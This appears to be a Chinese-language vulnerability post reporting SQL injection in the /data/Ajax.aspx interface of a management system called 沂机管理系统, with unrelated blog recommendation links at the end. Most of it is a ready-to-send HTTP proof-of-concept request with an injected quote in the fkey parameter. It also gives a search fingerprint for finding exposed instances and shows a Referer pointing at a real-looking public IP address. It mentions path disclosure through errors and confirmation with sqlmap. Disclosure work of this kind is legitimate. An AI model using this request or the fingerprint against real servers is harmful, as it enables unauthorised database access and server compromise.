沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞

漏洞描述

沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞,攻击者可以获取服务器权限

漏洞复现

body="后台管理系统演示版"

POC

GET /data/Ajax.aspx?method=log_list&page=1&limit=20&fkey=1'&fdate1=2024-10-01+00%3A00%3A00&fdate2=2024-10-01+23%3A59%3A59 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/log_list.aspx?ModuleID=104&navtabid=a102&reporttitle=60xZrkSLVc4i9GTkoGayYA==&fwidth=600&fheight=355
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive

bp 报错泄露绝对路径

sqlmap确认有漏洞

相关推荐
我叫汪枫1 分钟前
Vue2如何优雅处理多个组件渲染
前端·javascript·vue.js
天天进步20151 分钟前
基于 Vue 3 实现无限滚动翻页组件
前端·javascript·vue.js
m0_748255652 分钟前
利用 Jsoup 进行高效 Web 抓取与 HTML 处理
前端·html
好开心3321 分钟前
04、Vue与Ajax
前端·ajax·前端框架·vue·js
快乐点吧24 分钟前
【前端面试】三次握手/http/https,是否跳转携带cookie,跨域
前端·http·面试
是十一月末29 分钟前
Mysql语法之DQL查询的多行函数
开发语言·数据库·sql·mysql
每天进步一大步33 分钟前
webSokect安卓和web适配的Bug 适用实时语音场景
android·前端·bug·web
我叫啥都行36 分钟前
计算机基础知识复习12.20
java·jvm·笔记·后端·sql
Cachel wood1 小时前
Vue.js前端框架教程13:Vue空值合并?? 可选链?.和展开运算符...
linux·前端·javascript·vue.js·前端框架·ecmascript
鱼樱前端1 小时前
快速上手uni-app,真的只需要几分钟
前端·vue.js·uni-app